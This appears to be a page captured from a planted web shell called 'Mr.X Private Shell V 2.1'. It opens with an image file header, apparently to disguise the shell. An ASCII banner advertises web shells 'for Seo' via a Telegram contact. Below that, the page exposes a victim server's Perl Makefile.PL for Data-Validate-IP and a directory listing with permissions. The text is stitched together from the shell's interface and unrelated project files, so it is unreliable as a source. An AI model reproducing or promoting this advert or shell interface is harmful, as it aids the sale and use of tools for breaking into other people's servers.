����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# This Makefile.PL for Data-Validate-IP was generated by
# Dist::Zilla::Plugin::DROLSKY::MakeMaker 1.22
# and Dist::Zilla::Plugin::MakeMaker::Awesome 0.49.
# Don't edit it but the dist.ini and plugins used to construct it.
use strict;
use warnings;
use 5.008;
use ExtUtils::MakeMaker;
my %WriteMakefileArgs = (
"ABSTRACT" => "IPv4 and IPv6 validation methods",
"AUTHOR" => "Neil Neely <neil\@neely.cx>, Dave Rolsky <autarch\@urth.org>",
"CONFIGURE_REQUIRES" => {
"ExtUtils::MakeMaker" => 0
},
"DISTNAME" => "Data-Validate-IP",
"LICENSE" => "perl",
"MIN_PERL_VERSION" => "5.008",
"NAME" => "Data::Validate::IP",
"PREREQ_PM" => {
"Exporter" => 0,
"NetAddr::IP" => 4,
"Scalar::Util" => 0,
"base" => 0,
"strict" => 0,
"warnings" => 0
},
"TEST_REQUIRES" => {
"ExtUtils::MakeMaker" => 0,
"File::Spec" => 0,
"Test::More" => "0.96",
"Test::Requires" => 0,
"lib" => 0
},
"VERSION" => "0.31",
"test" => {
"TESTS" => "t/*.t"
}
);
my %FallbackPrereqs = (
"Exporter" => 0,
"ExtUtils::MakeMaker" => 0,
"File::Spec" => 0,
"NetAddr::IP" => 4,
"Scalar::Util" => 0,
"Test::More" => "0.96",
"Test::Requires" => 0,
"base" => 0,
"lib" => 0,
"strict" => 0,
"warnings" => 0
);
unless ( eval { ExtUtils::MakeMaker->VERSION('6.63_03') } ) {
delete $WriteMakefileArgs{TEST_REQUIRES};
delete $WriteMakefileArgs{BUILD_REQUIRES};
$WriteMakefileArgs{PREREQ_PM} = \%FallbackPrereqs;
}
delete $WriteMakefileArgs{CONFIGURE_REQUIRES}
unless eval { ExtUtils::MakeMaker->VERSION(6.52) };
WriteMakefile(%WriteMakefileArgs);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| bench | Folder | 0775 |
|
|
| blib | Folder | 0755 |
|
|
| dev-bin | Folder | 0775 |
|
|
| git | Folder | 0775 |
|
|
| lib | Folder | 0775 |
|
|
| t | Folder | 0775 |
|
|
| xt | Folder | 0775 |
|
|
| CODE_OF_CONDUCT.md | File | 3.17 KB | 0644 |
|
| CONTRIBUTING.md | File | 4.25 KB | 0644 |
|
| Changes | File | 6.86 KB | 0644 |
|
| INSTALL | File | 2.39 KB | 0644 |
|
| LICENSE | File | 17.91 KB | 0644 |
|
| MANIFEST | File | 825 B | 0644 |
|
| META.json | File | 36.49 KB | 0644 |
|
| META.yml | File | 23.36 KB | 0644 |
|
| MYMETA.json | File | 36.58 KB | 0644 |
|
| MYMETA.yml | File | 23.35 KB | 0644 |
|
| Makefile | File | 30.5 KB | 0644 |
|
| Makefile.PL | File | 1.57 KB | 0644 |
|
| README.md | File | 9.61 KB | 0644 |
|
| azure-pipelines.yml | File | 668 B | 0644 |
|
| cpanfile | File | 1.61 KB | 0644 |
|
| dist.ini | File | 615 B | 0644 |
|
| perlcriticrc | File | 1.94 KB | 0644 |
|
| perltidyrc | File | 301 B | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|
| precious.toml | File | 1.33 KB | 0644 |
|